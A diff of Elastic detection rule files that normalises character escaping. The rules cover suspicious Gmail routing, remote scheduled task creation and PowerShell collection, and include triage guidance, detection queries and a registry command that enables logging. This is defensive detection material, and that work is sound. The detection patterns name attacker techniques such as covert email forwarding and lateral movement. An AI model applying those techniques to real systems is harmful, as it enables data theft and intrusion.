URLs or attachments can be submitted to VirusTotal for reputational services.\n\n### False positive analysis\n\n- This rule searches for domain-wide custom email routes created in the admin console of Google Workspace. Administrators might create custom email routes to fulfill organizational requirements.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Custom Gmail Route Created or Modified\n\nGmail is a popular cloud-based email service developed and managed by Google. Gmail is one of many services available for users with Google Workspace accounts.\n\nThreat actors often send phishing emails containing malicious URL links or attachments to corporate Gmail accounts. Google Workspace identity relies on the corporate user Gmail account and if stolen, allows threat actors to further their intrusion efforts from valid user accounts.\n\nThis rule identifies the creation of a custom global Gmail route by an administrator from the Google Workspace admin console. Custom email routes could indicate an attempt to secretly forward sensitive emails to unintentional recipients.\n\n#### Possible investigation steps\n\n- Identify the user account that created the custom email route and verify that they should have administrative privileges.\n- Review the added recipients from the custom email route and confidentiality of potential email contents.\n- Identify the user account, then review `event.action` values for related activity within the last 48 hours.\n- If the Google Workspace license is Enterprise Plus or Education Plus, search for emails matching the route filters. To find the Gmail event logs, go to `Reporting > Audit and investigation > Gmail log events`.\n- If existing emails have been sent and match the custom route criteria, review the sender and contents for malicious URL links and attachments.\n- Identified URLs or attachments can be submitted to VirusTotal for reputational services.\n\n### False positive analysis\n\n- This rule searches for domain-wide custom email routes created in the admin console of Google Workspace. Administrators might create custom email routes to fulfill organizational requirements.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:(\"CREATE_GMAIL_SETTING\" or \"CHANGE_GMAIL_SETTING\")\n and google_workspace.event.type:\"EMAIL_SETTINGS\" and google_workspace.admin.setting.name:(\"EMAIL_ROUTE\" or \"MESSAGE_SECURITY_RULE\")\n", "references": [ "https://support.google.com/a/answer/2685650?hl=en" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_106.json index 8d94b99f36b..fdebbe35904 100644 --- a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_106.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Custom Gmail Route Created or Modified", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Custom Gmail Route Created or Modified\n\nGmail is a popular cloud-based email service developed and managed by Google. Gmail is one of many services available for users with Google Workspace accounts.\n\nThreat actors often send phishing emails containing malicious URL links or attachments to corporate Gmail accounts. Google Workspace identity relies on the corporate user Gmail account and if stolen, allows threat actors to further their intrusion efforts from valid user accounts.\n\nThis rule identifies the creation of a custom global Gmail route by an administrator from the Google Workspace admin console. Custom email routes could indicate an attempt to secretly forward sensitive emails to unintentional recipients.\n\n#### Possible investigation steps\n\n- Identify the user account that created the custom email route and verify that they should have administrative privileges.\n- Review the added recipients from the custom email route and confidentiality of potential email contents.\n- Identify the user account, then review `event.action` values for related activity within the last 48 hours.\n- If the Google Workspace license is Enterprise Plus or Education Plus, search for emails matching the route filters. To find the Gmail event logs, go to `Reporting \u003e Audit and investigation \u003e Gmail log events`.\n- If existing emails have been sent and match the custom route criteria, review the sender and contents for malicious URL links and attachments.\n- Identified URLs or attachments can be submitted to VirusTotal for reputational services.\n\n### False positive analysis\n\n- This rule searches for domain-wide custom email routes created in the admin console of Google Workspace. Administrators might create custom email routes to fulfill organizational requirements.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Custom Gmail Route Created or Modified\n\nGmail is a popular cloud-based email service developed and managed by Google. Gmail is one of many services available for users with Google Workspace accounts.\n\nThreat actors often send phishing emails containing malicious URL links or attachments to corporate Gmail accounts. Google Workspace identity relies on the corporate user Gmail account and if stolen, allows threat actors to further their intrusion efforts from valid user accounts.\n\nThis rule identifies the creation of a custom global Gmail route by an administrator from the Google Workspace admin console. Custom email routes could indicate an attempt to secretly forward sensitive emails to unintentional recipients.\n\n#### Possible investigation steps\n\n- Identify the user account that created the custom email route and verify that they should have administrative privileges.\n- Review the added recipients from the custom email route and confidentiality of potential email contents.\n- Identify the user account, then review `event.action` values for related activity within the last 48 hours.\n- If the Google Workspace license is Enterprise Plus or Education Plus, search for emails matching the route filters. To find the Gmail event logs, go to `Reporting > Audit and investigation > Gmail log events`.\n- If existing emails have been sent and match the custom route criteria, review the sender and contents for malicious URL links and attachments.\n- Identified URLs or attachments can be submitted to VirusTotal for reputational services.\n\n### False positive analysis\n\n- This rule searches for domain-wide custom email routes created in the admin console of Google Workspace. Administrators might create custom email routes to fulfill organizational requirements.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:(\"CREATE_GMAIL_SETTING\" or \"CHANGE_GMAIL_SETTING\")\n and google_workspace.event.type:\"EMAIL_SETTINGS\" and google_workspace.admin.setting.name:(\"EMAIL_ROUTE\" or \"MESSAGE_SECURITY_RULE\")\n", "references": [ "https://support.google.com/a/answer/2685650?hl=en" @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_104.json b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_104.json index 353c9979572..ed11f66bc31 100644 --- a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_104.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Remote Scheduled Task Creation", "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the base64 encoded tasks actions registry value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", - "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port \u003e= 49152 and destination.port \u003e= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port >= 49152 and destination.port >= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", "related_integrations": [ { "package": "endpoint", @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_105.json b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_105.json index 4349f5bb697..4b558ad07c4 100644 --- a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_105.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Remote Scheduled Task Creation", "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the base64 encoded tasks actions registry value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", - "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port \u003e= 49152 and destination.port \u003e= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port >= 49152 and destination.port >= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", "related_integrations": [ { "package": "endpoint", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_106.json b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_106.json index 9dd4247b1f2..7fd9d4ca77a 100644 --- a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_106.json +++ b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_106.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Remote Scheduled Task Creation", "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the base64 encoded tasks actions registry value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", - "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port \u003e= 49152 and destination.port \u003e= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port >= 49152 and destination.port >= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", "related_integrations": [ { "package": "endpoint", @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_105.json b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_105.json index 56be0a50232..9ef3d9f23da 100644 --- a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_105.json +++ b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_105.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "959a7353-1129-4aa7-9084-30746b256a70", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_106.json b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_106.json index 3336af9fa79..94371c83138 100644 --- a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_106.json +++ b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_106.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "959a7353-1129-4aa7-9084-30746b256a70", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_107.json b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_107.json index b61afa0a4fa..10f8fe5ab8b 100644 --- a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_107.json +++ b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_107.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "959a7353-1129-4aa7-9084-30746b256a70", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_1.json b/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_1.json index 22f5933dd37..1d058316d8b 100644 --- a/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_1.json +++ b/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_1.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_2.json b/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_2.json index 92a5cc48d3f..f635eac774e 100644 --- a/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_2.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_103.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_103.json index c06521ca55e..51864c889cc 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_103.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_103.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for 